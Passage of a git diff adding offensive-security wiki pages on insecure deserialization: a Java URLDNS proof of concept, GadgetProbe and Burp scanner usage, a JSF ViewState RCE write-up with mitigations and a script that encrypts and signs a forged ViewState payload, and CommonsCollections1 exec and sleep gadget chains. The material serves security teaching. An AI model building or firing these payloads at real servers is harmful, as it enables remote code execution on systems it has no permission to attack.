+* [**https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/**](https://www.notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net/)\*\*\*\*
+* \*\*\*\*[**https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817**](https://medium.com/@swapneildash/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817) ****
+* \*\*\*\*[**https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/**](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/)\*\*\*\*
+
diff --git a/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
new file mode 100644
index 00000000..174c902a
--- /dev/null
+++ b/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md
@@ -0,0 +1,190 @@
+# Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
+
+## DNS request on deserialization
+
+The class `java.net.URL` implements `Serializable`, this means that this class can be serialized.
+
+```java
+public final class URL implements java.io.Serializable {
+```
+
+This class have a **curious behaviour.** From the documentation: “**Two hosts are considered equivalent if both host names can be resolved into the same IP addresses**”.  
+Then, every-time an URL object calls **any** of the **functions `equals`** or **`hashCode`** a **DNS request** to get the IP Address is going to be **sent**.
+
+**Calling** the function **`hashCode`** **from** an **URL** object is fairly easy, it's enough to insert this object inside a `HashMap` that is going to be deserialized. This is because **at the end** of the **`readObject`** function from `HashMap` this code is executed:
+
+```java
+private void readObject(java.io.ObjectInputStream s)
+        throws IOException, ClassNotFoundException {
+        [   ...   ]
+    for (int i = 0; i < mappings; i++) {
+        [   ...   ]
+        putVal(hash(key), key, value, false, false);
+    }
+```
+
+It is **going** the **execute** `putVal` with every value inside the `HashMap`. But, more relevant is the call to `hash` with every value. This is the code of the `hash` function:
+
+```java
+static final int hash(Object key) {
+    int h;
+    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
+}
+```
+
+As you can observe, **when deserializing** a **`HashMap`** the function `hash` is going to **be executed with every object** and **during** the **`hash`** execution **it's going to be executed `.hashCode()` of the object**. Therefore, if you **deserializes** a **`HashMap`** **containing** a **URL** object, the **URL object** will **execute** `.hashCode()`.
+
+Now, lets take a look to the code of `URLObject.hashCode()` :
+
+```java
+ public synchronized int hashCode() {
+        if (hashCode != -1)
+            return hashCode;
+
+        hashCode = handler.hashCode(this);
+        return hashCode;
+```
+
+As you can see, when a `URLObject` executes`.hashCode()` it is called `hashCode(this)`. A continuation you can see the code of this function:
+
+```java
+ protected int hashCode(URL u) {
+        int h = 0;
+
+        // Generate the protocol part.
+        String protocol = u.getProtocol();
+        if (protocol != null)
+            h += protocol.hashCode();
+
+        // Generate the host part.
+        InetAddress addr = getHostAddress(u);
+        [   ...   ]
+```
+
+You can see that a `getHostAddress` is executed to the domain, **launching a DNS query**.
+
+Therefore, this class can be **abused** in order to **launch** a **DNS query** to **demonstrate** that **deserialization** is possible, or even to **exfiltrate information** \(you can append as subdomain the output of a command execution\).
+
+### URLDNS payload code example
+
+You can find the [URDNS payload code from ysoserial here](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java). However, just for make it easier to understand how to code it I created my own PoC \(based on the one from ysoserial\):
+
+```java
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.net.InetAddress;
+import java.net.URLConnection;
+import java.net.URLStreamHandler;
+import java.util.HashMap;
+import java.net.URL;
+
+public class URLDNS {
+	public static void GeneratePayload(Object instance, String file)
+            throws Exception {
+        //Serialize the constructed payload and write it to the file
+        File f = new File(file);
+        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
+        out.writeObject(instance);
+        out.flush();
+        out.close();
+    }
+	public static void payloadTest(String file) throws Exception {
+        //Read the written payload and deserialize it
+        ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
+        Object obj = in.readObject();
+        System.out.println(obj);
+        in.close();
+    }
+	
+	public static void main(final String[] args) throws Exception {
+		String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
+		HashMap ht = new HashMap(); // HashMap that will contain the URL
+		URLStreamHandler handler = new SilentURLStreamHandler();
+    URL u = new URL(null, url, handler); // URL to use as the Key
+    ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
+
+    // During the put above, the URL's hashCode is calculated and cached.
+    // This resets that so the next time hashCode is called a DNS lookup will be triggered.
+    final Field field = u.getClass().getDeclaredField("hashCode");
+    field.setAccessible(true);
+		field.set(u, -1);
+		
+		//Test the payloads
+		GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
+	}
+}
+
+
+class SilentURLStreamHandler extends URLStreamHandler {
+
+    protected URLConnection openConnection(URL u) throws IOException {
+        return null;
+    }
+
+    protected synchronized InetAddress getHostAddress(URL u) {
+        return null;
+    }
+}
+```
+
+### More information
+
+* [https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/](https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/)
+* In the original idea thee commons collections payload was changed to perform a DNS query, this was less reliable that the proposed method, but this is the post: [https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/](https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/)
+
+## GadgetProbe
+
+You can download [**GadgetProbe**](https://github.com/BishopFox/GadgetProbe) from the Burp Suite App Store \(Extender\).
+
+**GadgetProbe** will try to figure out if some **Java classes exist** on the Java class of the server so you can know **if** it's **vulnerable** to some known exploit.
+
+### How does it work
+
+**GadgetProbe** will use the same **DNS payload of the previous section** but **before** running the DNS query it will **try to deserialize an arbitrary class**. If the **arbitrary class exists**, the **DNS query** will be **sent** and GadgProbe will note that this class exist. If the **DNS** request is **never sent**, this means that the **arbitrary class wasn't deserialized** successfully so either it's not present or it''s **not serializable/exploitable**.
+
+Inside the github, [**GadgetProbe has some wordlists**](https://github.com/BishopFox/GadgetProbe/tree/master/wordlists) ****with Java classes for being tested.
+
+![](../../.gitbook/assets/intruder4%20%281%29.gif)
+
+### More Information
+
+* [https://know.bishopfox.com/research/gadgetprobe](https://know.bishopfox.com/research/gadgetprobe)
+
+## Java Deserialization Scanner
+
+This scanner can be **download** from the Burp App Store \(**Extender**\).  
+The **extension** has **passive** and active **capabilities**. 
+
+### Passive
+
+By default it **checks passively** all the requests and responses sent **looking** for **Java serialized magic bytes** and will present a vulnerability warning if any is found:
+
+![](../../.gitbook/assets/image%20%28272%29.png)
+
+### Active
+
+#### Manual Testing
+
+You can select a request, right click and `Send request to DS - Manual Testing`.  
+Then, inside the _Deserialization Scanner Tab_ --&gt; _Manual testing tab_ you can select the **insertion point**. And **launch the testing** \(Select the appropriate attack depending on the encoding used\).
+
+![](../../.gitbook/assets/3-1.png)
+
+Even if this is called "Manual testing", it's pretty **automated**. It will automatically check if the **deserialization** is **vulnerable** to **any ysoserial payload** checking the libraries present on the web server and will highlight the ones vulnerable. In order to **check** for **vulnerable libraries** you can select to launch **Javas Sleeps**, **sleeps** via **CPU** consumption, or using **DNS** as it has previously being mentioned.
+
+#### Exploiting
+
+Once you have identified a vulnerable library you can send the request to the _Exploiting Tab_.  
+I this tab you have to **select** the **injection point** again, an **write** the **vulnerable library** you want to create a payload for, and the **command**. Then, just press the appropriate **Attack** button.
+
+![](../../.gitbook/assets/4%20%281%29.png)
+
+### More Information
+
+* [https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/](https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/)
+
diff --git a/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md b/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
new file mode 100644
index 00000000..4e461fe9
--- /dev/null
+++ b/pentesting-web/deserialization/java-jsf-viewstate-.faces-deserialization.md
@@ -0,0 +1,205 @@
+# Java JSF ViewState \(.faces\) Deserialization
+
+## Intro
+
+After we had a look at [RCEs through misconfigured JSON libraries](https://www.alphabot.com/security/blog/2017/net/How-to-configure-Json.NET-to-create-a-vulnerable-web-API.html) we started analyzing the ViewStates of JSF implementations. [JavaServer Faces \(JSF\)](https://en.wikipedia.org/wiki/JavaServer_Faces) is a User Interface \(UI\) technology for building web UIs with reusable components. JSF is mostly used for enterprise applications and a JSF implementation is typically used by a web application that runs on a Java application server like JBoss EAP or WebLogic Server. There are two well-known implementations of the JSF specification:
+
+* Oracle Mojarra \(JSF reference implementation\)
+* Apache MyFaces
+
+## Scope
+
+This blog post focuses on the two JSF 2.x implementations: Oracle Mojarra \(Reference Implementation\) and Apache MyFaces. Older implementations \(JSF 1.x\) are also likely to be affected by the vulnerabilities described in this post. \(JSF 2.0.x was initially released in 2009, the current version is 2.3.x\).
+
+## The state of the ViewState
+
+A difference between JSF and similar web technologies is that JSF makes use of ViewStates \(in addition to sessions\) to store the current state of the view \(e.g. what parts of the view should currently be displayed\). The ViewState can be stored on the `server` or the `client`. JSF ViewStates are typically automatically embedded into HTML forms as hidden field with the name `javax.faces.ViewState`. They are sent back to the server if the form is submitted.
+
+### Server-side ViewState
+
+If the JSF ViewState is configured to sit on the `server` the hidden `javax.faces.ViewState` field contains an id that helps the server to retrieve the correct state. In the case of MyFaces that id is a **serialized Java object**!
+
+### Client-side ViewState
+
+If the JSF ViewState is configured to sit on the `client` the hidden `javax.faces.ViewState` field contains a **serialized Java object** that is at least Base64 encoded. You might have realized by now that this is a potential road to disaster! That might be one of the reasons why nowadays JSF ViewStates are encrypted and signed before being sent to the client.The dangers of serialized Java objects
+
+In 2015 at the AppSec California conference [Gabriel Lawrence](https://twitter.com/gebl) and [Chris Frohoff](https://twitter.com/frohoff) held a presentation with the title [Marshalling Pickles \(how deserializing objects can ruin your day\)](https://frohoff.github.io/appseccali-marshalling-pickles/). This presentation shed some light on forgotten problems with Java object serialization and led to the discovery of [several severe remote code execution \(RCE\) vulnerabilities](https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/).
+
+Unfortunately, it led some people to believe that the vulnerability could be mitigated by removing/updating certain versions of Apache Commons Collections. An action which can indeed help but does not solve the root cause of the problem: Deserialization of Untrusted Data \([CWE 502](https://cwe.mitre.org/data/definitions/502.html)\). In other words:  
+**The use of a 'vulnerable' Apache Commons Collections version does not mean that the application is vulnerable, neither does the absence of such a library version mean that the application is not vulnerable.**
+
+However, after a malicious hacker [shut down and encrypted the systems of the San Francisco Municipal Transportation Agency](https://krebsonsecurity.com/2016/11/san-francisco-rail-system-hacker-hacked/) via a "Mad Gadget"/"Apache Commons Collections Deserialization Vulnerability" Google started [Operation Rosehub](https://opensource.googleblog.com/2017/03/operation-rosehub.html). The aim of operation Rosehub was to find as many Java open source projects as possible which used an 'attacker-friendly' commons collections version as dependency and submit pull requests to the project owners so that those projects would stop using problematic commons collections versions in newer releases.
+
+## The attack on the ViewState
+
+Let’s assume we have a web application with a JSF based login page:
+
+![JSF based login](https://www.alphabot.com/images/blog/jsf-viewstate/jsf-viewstate-login.png)
+
+That login page has a ViewState that is neither encrypted nor signed. So when we look at its HTML source we see a hidden field containing the ViewState:Unencrypted MyFaces ViewState:
+
+```text
+<input type="hidden" name="javax.faces.ViewState" id="j_id__v_0:javax.faces.ViewState:1" value="rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJwdAAML2xvZ2luLnhodG1s" autocomplete="off" />
+```
+
+  
+If you decode the above ViewState using Base64 you will notice that it contains a serialized Java object. This ViewState is sent back to the server via POST when the form is submitted \(e.g. click on Login\). Now before the ViewState is POSTed back to the server the attacker replaces the ViewState with his own malicious ViewState using a gadget that’s already on the server’s classpath \(e.g. `InvokerTransformer` from commons-collections-3.2.1.jar\) or even a gadget that is not yet known to the public. With said malicious gadget placed in the ViewState the attacker specifies which commands he wants to run on the server. The flexibility of what an attacker can do is limited by the powers of the available gadgets on the classpath of the server. In case of the `InvokerTransformer` the attacker can specify which command line commands should be executed on the server. The attacker in our example chose to start a calculator on the UI of our Linux based server.
+
+After the attacker has sent his modified form back to the server the JSF implementation tries to deserialize the provided ViewState. Now even before the deserialization of the ViewState has ended the command is executed and the calculator is started on the server:
+
+![calculator started via a JSF ViewState](https://www.alphabot.com/images/blog/jsf-viewstate/jsf-viewstate-started-calculator.png)
+
+Everything happened before the JSF implementation could have a look at the ViewState and decide that it was no good. When the ViewState was found to be invalid typically an error is sent back to the client like “View expired”. But then it’s already too late. The attacker had access to the server and has run commands. \(Most real-world attackers don’t start a calculator but they typically deploy a remote shell, which they then use to access the server.\)
+
+=&gt; All in all this example demonstrates a very dangerous unauthenticated remote code execution \(RCE\) vulnerability.
+
+\(Almost the same attack scenario against JSF as depicted above was already outlined and demonstrated in the 2015 presentation \(pages 65 to 67\): [Marshalling Pickles](https://frohoff.github.io/appseccali-marshalling-pickles/) held by Frohoff and Lawrence.\)
+
+## The preconditions for a successful attack
+
+Now, what are the ingredients for a disaster?
+
+* unencrypted ViewState
+* Gadget on the classpath of the server
+* In case of Mojarra: ViewState configured to reside on the `client`
+* In case of MyFaces: ViewState configured to reside on the `client` **or** the `server`
+
+Let’s have a look at those points in relation to the two JSF implementations.
+
+## Oracle Mojarra \(JSF reference implementation\)
+
+As said before Oracle Mojarra is the JSF Reference Implementation \(RI\) but might not be known under that name. It might be known as Sun JSF RI, recognized with the java package name `com.sun.faces` or with the ambiguous jar name `jsf-impl.jar`.
+
+### Mojarra: unencrypted ViewState
+
+So here’s the thing: Mojarra did not encrypt and sign the client-side ViewState by default in most of the versions of 2.0.x and 2.1.x. It is important to note that a server-side ViewState is the default in both JSF implementations but a developer could easily switch the configuration to use a client-side viewstate by setting the `javax.faces.STATE_SAVING_METHOD` param to `client`. The param name does in no way give away that changing it to client introduces grave remote code execution vulnerabilities \(e.g. a client-side viewstate might be used in clustered web applications\).
+
+Whilst client-side ViewState encryption is the default in Mojarra 2.2 and later versions it was not for the 2.0.x and 2.1.x branches. However, in May 2016 the Mojarra developers started backporting default client-side ViewState encryption to [2.0.x](https://github.com/javaserverfaces/mojarra/issues/4142) and [2.1.x](https://github.com/javaserverfaces/mojarra/issues/4141) when they realized that unencrypted ViewStates lead to RCE vulnerabilities.
+
+So at least version [2.1.29-08](https://mvnrepository.com/artifact/com.sun.faces/jsf-impl/2.1.29-08) \(released in July 2016\) from the 2.1.x Branch and version [2.0.11-04](https://mvnrepository.com/artifact/com.sun.faces/jsf-impl/2.0.11-04) \(also released in July 2016\) from the 2.0.x have encryption enabled by default.
+
+When we analyzed the Mojarra libraries we noticed that Red Hat also releases Mojarra versions for the 2.1.x and 2.0.x branches, the latest being [2.1.29-jbossorg-1](https://mvnrepository.com/artifact/com.sun.faces/jsf-impl/2.1.29-jbossorg-1) and [2.0.4-b09-jbossorg-4](https://mvnrepository.com/artifact/com.sun.faces/jsf-impl/2.0.4-b09-jbossorg-4). Since both releases were without default ViewState encryption we contacted Red Hat and they promptly created [Bug 1479661 - JSF client side view state saving deserializes data](https://bugzilla.redhat.com/show_bug.cgi?id=1479661) in their bugtracker with following mitigation advice for the 2.1.x branch:
+
+> A vulnerable web application needs to have set javax.faces.STATE\_SAVING\_METHOD to 'client' to enable client-side view state saving. The default value on Enterprise Application Platform \(EAP\) 6.4.x is 'server'.  
+>   
+> If javax.faces.STATE\_SAVING\_METHOD is set to 'client' a mitigation for this issue is to encrypt the view by setting com.sun.faces.ClientStateSavingPassword in the application web.xml:
+>
+> ```markup
+>   <context-param>
+>     <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
+>     <param-value>client</param-value>
+>   </context-param>
+>
+>   <env­-entry> 
+>     <env­-entry-­name>com.sun.faces.ClientStateSavingPassword</env­-entry-­name> 
+>     <env-­entry-­type>java.lang.String</env-­entry-­type> 
+>     <env-­entry-­value>[some secret password]</env-­entry-value>
+>   </env­-entry>
+> ```
+
+Unfortunately, in some even older versions that mitigation approach does not work: according to [this great StackOverflow answer](https://stackoverflow.com/questions/28231372/com-sun-faces-clientstatesavingpassword-recommendations-for-actual-password) in the JSF implementation documentation it was incorrectly documented that the param `com.sun.faces.ClientStateSavingPassword` is used to change the Client State Saving Password, while the parameter up until 2.1.18 was accidentally called `ClientStateSavingPassword`. So providing a Client State Saving Password as documented didn’t have an effect! In Mojarra 2.1.19 and later versions they changed the parameter name to the documented name `com.sun.faces.ClientStateSavingPassword`.
+
+By default Mojarra nowadays uses `AES` as encryption algorithm and `HMAC-SHA256` to authenticate the ViewState.
+
+### Mojarra: ViewState configured to reside on the client
+
+The default `javax.faces.STATE_SAVING_METHOD` setting of Mojarra is `server`. A developer needs to manually change it to `client` so that Mojarra becomes vulnerable to the above described attack scenario. If a serialized ViewState is sent to the server but Mojarra uses `server` side ViewState saving it will not try to deserialize it \(However, a `StringIndexOutOfBoundsException` may occur\).
+
+### Mojarra: Mitigation
+
+When using Mojarra with a server-side ViewState nothing has to be done.
+
+When using Mojarra &lt; 2.2 and a client-side ViewState there are following possible mitigations:
+
+* Update Mojarra to 2.0.11-04 respectively 2.1.29-08.
+* Use a server-side ViewState instead of a client-side ViewState.
+* When using older Versions of Mojarra and an update or switching to a server-side ViewState is not possible: set a ViewState password as temporary solution and make sure it is the right parameter \(not necessarily the one in the corresponding documentation\)
+
+For later Mojarra versions:
+
+* Check that the ViewState encryptions is not disabled via the param: `com.sun.faces.disableClientStateEncryption`
+
+## Apache MyFaces
+
+Apache MyFaces is the other big and widely used JSF implementation.
+
+### MyFaces: unencrypted ViewState
+
+MyFaces does encrypt the ViewState by default, as stated in their [Security configuration Wiki page](https://wiki.apache.org/myfaces/Secure_Your_Application):
+
+> Encryption is enabled by default. Note that encription must be used in production environments and disable it could only be valid on testing/development environments.
+
+However, it is possible to disable ViewState encryption by setting the parameter `org.apache.myfaces.USE_ENCRYPTION` to `false`. \(Also it would be possible to use encryption but manually set an easy guessable password\). By default the ViewState encryption secret changes with every server restart.
+
+By default MyFaces uses `DES` as encryption algorithm and `HMAC-SHA1` to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like `AES` and `HMAC-SHA256`.
+
+### MyFaces: ViewState configured to reside on the client
+
+The default `javax.faces.STATE_SAVING_METHOD` setting of MyFaces is `server`. But: **MyFaces does always deserialize the ViewState** regardless of that setting. So it is of [great importance to not disable encryption when using MyFaces](https://issues.apache.org/jira/browse/MYFACES-4021)!
+
+\(We created an issue in the MyFaces bug tracker: [MYFACES-4133 Don’t deserialize the ViewState-ID if the state saving method is server](https://issues.apache.org/jira/browse/MYFACES-4133), maybe [this time](https://issues.apache.org/jira/browse/MYFACES-4021) the wish for more secure defaults will catch on.\)
+
+### MyFaces: Mitigation
+
+When using MyFaces make sure that encryption of the ViewState is not disabled \(via `org.apache.myfaces.USE_ENCRYPTION`\) regardless if the ViewState is stored on the client or the server.
+
+### Custom Encryption
+
+If somehow you manage to steal the password used you can attack the web server encrypting and signing the payload with this script:
+
+```python
+#!/usr/bin/python3
+import sys
+import hmac
+from urllib import parse
+from base64 import b64encode
+from hashlib import sha1
+from pyDes import *
+
+YELLOW = "\033[93m"
+GREEN = "\033[32m"
+
+def encrypt(payload,key):
+	cipher = des(key, ECB, IV=None, pad=None, padmode=PAD_PKCS5)
+	enc_payload = cipher.encrypt(payload)
+	return enc_payload
+
+def hmac_sig(enc_payload,key):
+	hmac_sig = hmac.new(key, enc_payload, sha1)
+	hmac_sig = hmac_sig.digest()
+	return hmac_sig
+
+key = b'JsF9876-'
+
+if len(sys.argv) != 3 :
+	print(YELLOW + "[!] Usage : {} [Payload File] [Output File]".format(sys.argv[0]))
+else:
+	with open(sys.argv[1], "rb") as f:
+		payload = f.read()
+		f.close()
+	print(YELLOW + "[+] Encrypting payload")
+	print(YELLOW + "  [!] Key : JsF9876-\n")
+	enc_payload = encrypt(payload,key)
+	print(YELLOW + "[+] Creating HMAC signature")
+	hmac_sig = hmac_sig(enc_payload,key)
+	print(YELLOW + "[+] Appending signature to the encrypted payload\n")
+	payload = b64encode(enc_payload + hmac_sig)
+	payload = parse.quote_plus(payload)
+	print(YELLOW + "[*] Final payload : {}\n".format(payload))
+	with open(sys.argv[2], "w") as f:
+		f.write(payload)
+		f.close()
+	print(GREEN + "[*] Saved to : {}".format(sys.argv[2]))
+```
+
+## Final thoughts
+
+Most facts about JSF ViewStates and their dangers presented in this blog post are not exactly new but it seems they were never presented in such a condensed way. It showed [once more](https://www.alphabot.com/security/blog/2017/net/How-to-configure-Json.NET-to-create-a-vulnerable-web-API.html) that seemingly harmless configuration changes can lead to serious vulnerabilities.
+
+=&gt; One of the problems seems to be that there is not enough knowledge transfer between security researchers and developers who actually use and configure libraries that might be dangerous when configured in certain ways.
+
+## References
+
+* [https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
+* [https://0xrick.github.io/hack-the-box/arkham/](https://0xrick.github.io/hack-the-box/arkham/)
+
diff --git a/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
new file mode 100644
index 00000000..44f8a28d
--- /dev/null
+++ b/pentesting-web/deserialization/java-transformers-to-rutime-exec-payload.md
@@ -0,0 +1,229 @@
+# CommonsCollection1 Payload - Java Transformers to Rutime exec\(\) and Thread Sleep
+
+## Java Transformers to Rutime exec\(\)
+
+In several places you can find a java deserialization payload that uses transformers from Apache common collections like the following one:
+
+```java
+import org.apache.commons.*;
+import org.apache.commons.collections.*;
+import org.apache.commons.collections.functors.*;
+import org.apache.commons.collections.map.*;
+import java.io.*;
+import java.lang.reflect.InvocationTargetException;
+import java.util.Map;
+import java.util.HashMap;
+
+public class CommonsCollections1PayloadOnly {
+    public static void main(String... args) {
+        String[] command = {"calc.exe"};
+        final Transformer[] transformers = new Transformer[]{
+                new ConstantTransformer(Runtime.class), //(1)
+                new InvokerTransformer("getMethod",
+                        new Class[]{ String.class, Class[].class},
+                        new Object[]{"getRuntime", new Class[0]}
+                ), //(2)
+                new InvokerTransformer("invoke",
+                        new Class[]{Object.class, Object[].class},
+                        new Object[]{null, new Object[0]}
+                ), //(3)
+                new InvokerTransformer("exec",
+                        new Class[]{String.class},
+                        command
+                ) //(4)
+        };
+        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
+        Map map = new HashMap<>();
+        Map lazyMap = LazyMap.decorate(map, chainedTransformer);
+        
+        //Execute gadgets
+        lazyMap.get("anything");
+    }
+}
+```
+
+If you don't know anything about java deserialization payloads could be difficult to figure out why this code will execute a calc.
+
+First of all you need to know that a **Transformer in Java** is something that **receives a class** and **transforms it to a different one**.   
+Also it's interesting to know that the **payload** being **executed** here is **equivalent** to:
+
+```java
+Runtime.getRuntime().exec(new String[]{"calc.exe"});
+```
+
+Or **more exactly**, what is going to be executed at the end would be:
+
+```java
+((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
+```
+
+### How
+
+So, how is the first payload presented equivalent to those "simple" one-liners?
+
+**First** of all, you can notice in the payload that a **chain \(array\) of transforms are created**:
+
+```java
+String[] command = {"calc.exe"};
+final Transformer[] transformers = new Transformer[]{
+        //(1) - Get gadget Class (from Runtime class)
+        new ConstantTransformer(Runtime.class),
+                
+        //(2) - Call from gadget Class (from Runtime class) the function "getMetod" to obtain "getRuntime"
+        new InvokerTransformer("getMethod",
+                new Class[]{ String.class, Class[].class},
+                new Object[]{"getRuntime", new Class[0]}
+        ), 
+        
+        //(3) - Call from (Runtime) Class.getMethod("getRuntime") to obtain a Runtime oject 
+        new InvokerTransformer("invoke",
+                new Class[]{Object.class, Object[].class},
+                new Object[]{null, new Object[0]}
+        ), 
+        
+        //(4) - Use the Runtime object to call exec with arbitrary commands
+        new InvokerTransformer("exec",
+                new Class[]{String.class},
+                command
+        )
+};
+ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
+
+```
+
+If you read the code you will notice that if you somehow chains the transformation of the array you could be able to execute arbitrary commands.
+
+So, **how are those transforms chained?**
+
+```java
+Map map = new HashMap<>();
+Map lazyMap = LazyMap.decorate(map, chainedTransformer);
+lazyMap.get("anything");
+```
+
+In the last section of the payload you can see that a **Map object is created**. Then, the function `decorate` is executed from `LazyMap` with the map object and the chained transformers. From the following code you can see that this will cause the **chained transformers** to be copied inside `lazyMap.factory` attribute:
+
+```java
+protected LazyMap(Map map, Transformer factory) {
+    super(map);
+    if (factory == null) {
+        throw new IllegalArgumentException("Factory must not be null");
+    }
+    this.factory = factory;
+}
+```
+
+And then the great finale is executed: `lazyMap.get("anything");`
+
+This is the code of the `get` function:
+
+```java
+public Object get(Object key) {
+    if (map.containsKey(key) == false) {
+        Object value = factory.transform(key);
+        map.put(key, value);
+        return value;
+    }
+    return map.get(key);
+}
+```
+
+And this is the code of the `transform` function
+
+```java
+public Object transform(Object object) {
+    for (int i = 0; i < iTransformers.length; i++) {
+        object = iTransformers[i].transform(object);
+    }
+    return object;
+}
+```
+
+So, remember that inside **factory** we had saved **`chainedTransformer`** and inside of the **`transform`** function we are **going through all those transformers chained** and executing one after another. The funny thing, is that **each transformer is using `object`** **as input** and **object is the output from the last transformer executed**. Therefore, **all the transforms are chained executing the malicious payload**.
+
+### Summary
+
+At the end, due to how is lazyMap managing the chained transformers inside the get method, it's like if we were executing the following code:
+
+```java
+Object value = "someting";
+        
+value = new ConstantTransformer(Runtime.class).transform(value); //(1)
+
+value = new InvokerTransformer("getMethod",
+                new Class[]{ String.class, Class[].class},
+                new Object[]{"getRuntime", null}
+        ).transform(value); //(2)
+        
+value = new InvokerTransformer("invoke",
+                new Class[]{Object.class, Object[].class},
+                new Object[]{null, new Object[0]}
+        ).transform(value); //(3)
+        
+value = new InvokerTransformer("exec",
+                new Class[]{String.class},
+                command
+        ).transform(value); //(4)
+```
+
+_Note how `value` is the input of each transform and the output of the previous transform , allowing the execution of a one-liner:_
+
+```java
+((Runtime) (Runtime.class.getMethod("getRuntime").invoke(null))).exec(new String[]{"calc.exe"});
+```
+
+Note that here it **was explained the gadgets** used for the **ComonsCollections1** payload. But it's left **how all this starts it's executing**. You can see [here that **ysoserial**](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java), in order to execute this payload, uses an `AnnotationInvocationHandler` object because **when this object gets deserialized**, it will **invoke** the `payload.get()` function that will **execute the whole payload**.
+
+## Java Thread Sleep
+
+This payload could be **handy to identify if the web is vulnerable as it will execute a sleep if it is**.
+
+```java
+import org.apache.commons.*;
+import org.apache.commons.collections.*;
+import org.apache.commons.collections.functors.*;
+import org.apache.commons.collections.map.*;
+import java.io.*;
+import java.lang.reflect.InvocationTargetException;
+import java.net.MalformedURLException;
+import java.net.URL;
+import java.util.Map;
+import java.util.HashMap;
+
+public class CommonsCollections1Sleep {
+    public static void main(String... args) {
+        final Transformer[] transformers = new Transformer[]{
+        		new ConstantTransformer(Thread.class),
+        		new InvokerTransformer("getMethod",
+        		        new Class[]{
+        		                String.class, Class[].class
+        		        },
+        		        new Object[]{
+        		                "sleep", new Class[]{Long.TYPE}
+        		        }),
+        		new InvokerTransformer("invoke",
+        		        new Class[]{
+        		                Object.class, Object[].class
+        		        }, new Object[]
+        		        {
+        		                null, new Object[] {7000L}
+        		        }),
+        };
+
+        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
+        Map map = new HashMap<>();
+        Map lazyMap = LazyMap.decorate(map, chainedTransformer);
+        
+        //Execute gadgets
+        lazyMap.get("anything");
+        
+    }
+}
+```
+
+## More Gadgets
+
+You can find more gadgets here: [https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html](https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html)
+
+## 
+
diff --git a/pentesting-web/deserialization/nodejs-deserialization-__proto__-abuse.md b/pentesting-web/deserialization/nodejs-deserialization-__proto__-abuse.md
new file mode 100644
index 00000000..fb2fafaf
--- /dev/null
+++ b/pentesting-web/deserialization/nodejs-deserialization-__proto__-abuse.md
@@ -0,0 +1,66 @@
+# NodeJS deserialization \_\_proto\_\_ abuse
+
+This information was copied from this research: [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/)
+
+While I was researching packages, I stumbled upon the idea to look at other approaches of attacks on deserialization, which are used in other languages. To achieve code execution we leverage functions with attacker’s controlled data which are called automatically during the deserialization process or after when an application interacts with a newly created object. Something similar to “magic methods” in other languages.
+
+Actually, there are a lot of packages which work completely differently, still after some experiments I came to an interesting semi-universal attack. It is based on two facts.  
+Firstly, many packages use the next approach in the deserialization process. They create an empty object and then set its properties using square brackets notations:
+
+```text
+obj[key]=value
+```
+
+where **key** and **value** are taken from JSON  
+Therefore we as attackers are able to control practically any property of a new object. If we look through the list of properties, our attention comes to the [cool \_\_proto\_\_ property ](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto). The property is used to access and change a prototype of an object. This means that we can change the object’s behavior and add/change its methods.
+
